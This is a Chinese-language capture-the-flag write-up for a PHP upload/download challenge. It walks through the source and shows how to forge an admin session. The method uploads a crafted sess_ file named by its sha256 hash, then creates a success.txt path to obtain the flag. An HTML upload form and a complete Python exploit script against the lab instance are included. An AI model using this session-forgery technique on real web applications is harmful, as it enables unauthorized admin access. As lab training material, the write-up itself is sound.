题目直接给了代码
<?php
error_reporting(0);
session_save_path("/var/babyctf/");
session_start();
require_once "/flag";
highlight_file(__FILE__);
if($_SESSION['username'] ==='admin')
{
$filename='/var/babyctf/success.txt';
if(file_exists($filename)){
safe_delete($filename);
die($flag);
}
}
else{
$_SESSION['username'] ='guest';
}
$direction = filter_input(INPUT_POST, 'direction');
$attr = filter_input(INPUT_POST, 'attr');
$dir_path = "/var/babyctf/".$attr;
if($attr==="private"){
$dir_path .= "/".$_SESSION['username'];
}
if($direction === "upload"){
try{
if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){
throw new RuntimeException('invalid upload');
}
$file_path = $dir_path."/".$_FILES['up_file']['name'];
$file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']);
if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
throw new RuntimeException('invalid file path');
}
@mkdir($dir_path, 0700, TRUE);
if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){
$upload_result = "uploaded";
}else{
throw new RuntimeException('error while saving');
}
} catch (RuntimeException $e) {
$upload_result = $e->getMessage();
}
} elseif ($direction === "download") {
try{
$filename = basename(filter_input(INPUT_POST, 'filename'));
$file_path = $dir_path."/".$filename;
if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
throw new RuntimeException('invalid file path');
}
if(!file_exists($file_path)) {
throw new RuntimeException('file not exist');
}
header('Content-Type: application/force-download');
header('Content-Length: '.filesize($file_path));
header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"');
if(readfile($file_path)){
$download_result = "downloaded";
}else{
throw new RuntimeException('error while saving');
}
} catch (RuntimeException $e) {
$download_result = $e->getMessage();
}
exit;
}
?>
一段一段分析
这里说明需要伪造session是admin,并且存在文件 success.txt,这样才能得到 flag
<?php
error_reporting(0);
session_save_path("/var/babyctf/");
session_start();
require_once "/flag";
highlight_file(__FILE__);
if($_SESSION['username'] ==='admin')
{
$filename='/var/babyctf/success.txt';
if(file_exists($filename)){
safe_delete($filename);
die($flag);
}
}
else{
$_SESSION['username'] ='guest';
}
这个就是一些路径和方法,如果 attr是 private 则访问特定用户的目录
$direction = filter_input(INPUT_POST, 'direction');
$attr = filter_input(INPUT_POST, 'attr');
$dir_path = "/var/babyctf/".$attr;
if($attr==="private"){
$dir_path .= "/".$_SESSION['username'];
}
上传文件时,文件重命名后面接 _+ sha256(文件内容)
下载文件没什么限制,只是限制了目录遍历
if($direction === "upload"){
try{
if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){
throw new RuntimeException('invalid upload');
}
$file_path = $dir_path."/".$_FILES['up_file']['name'];
$file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']);
if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
throw new RuntimeException('invalid file path');
}
@mkdir($dir_path, 0700, TRUE);
if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){
$upload_result = "uploaded";
}else{
throw new RuntimeException('error while saving');
}
} catch (RuntimeException $e) {
$upload_result = $e->getMessage();
}
} elseif ($direction === "download") {
try{
$filename = basename(filter_input(INPUT_POST, 'filename'));
$file_path = $dir_path."/".$filename;
if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
throw new RuntimeException('invalid file path');
}
if(!file_exists($file_path)) {
throw new RuntimeException('file not exist');
}
header('Content-Type: application/force-download');
header('Content-Length: '.filesize($file_path));
header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"');
if(readfile($file_path)){
$download_result = "downloaded";
}else{
throw new RuntimeException('error while saving');
}
} catch (RuntimeException $e) {
$download_result = $e->getMessage();
}
思路就是通过上传构造一个 sess_sha256 文件去伪造 admin,然后再上传一个success.txt,就可以访问到 flag了
开始正题
查看此时的 sess_phpsessid 文件
构造sess文件
计算下 sha256 留着备用作为 sessionid
<?php
echo hash_file("sha256","sess");
# 432b8b09e30c4a75986b719d1312b63a69f1b833ab602c9ad5f0299d1d76a5a4
现在来上传 sess和success.txt
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST数据包POC</title>
</head>
<body>
<form action="http://aebbe98f-6ac4-4390-b37c-4a978423c44f.node4.buuoj.cn:81/" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="up_file"><br>
<input type="hidden" name="attr" value=".">
<input type="hidden" name="direction" value="upload">
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
sess 确定是传上来了
success.txt 不能直接上传,因为还会拼接一个 sha256,所以要截断掉
直接修改 attr 为新的路径也是可以的
放个大佬的脚本直接索更爽
import hashlib
from io import BytesIO
import requests
import re
target_url = 'http://339a3908-1d85-4a0b-8672-04981e5218cf.node4.buuoj.cn:81/'
def BeAdmin():
files = {
"up_file": ("sess", BytesIO('\x08usernames:5:"admin";'.encode('utf-8')))
}
data = {
'attr': '.',
'direction': 'upload'
}
url = target_url
r = requests.post(url=url, data=data, files=files)
session_id = hashlib.sha256('\x08usernames:5:"admin";'.encode('utf-8')).hexdigest()
return session_id
def upload_success():
files = {
"up_file": ("success.txt", BytesIO('good job!'.encode('utf-8')))
}
data = {
'attr': 'success.txt',
'direction': 'upload'
}
url = target_url
r = requests.post(url=url, data=data, files=files)
php_session_id = BeAdmin()
print(php_session_id)
cookies = {
'PHPSESSID': php_session_id
}
url = target_url
s = requests.get(url)
r = requests.get(url=url, cookies=cookies)
print(r.content[len(s.content):])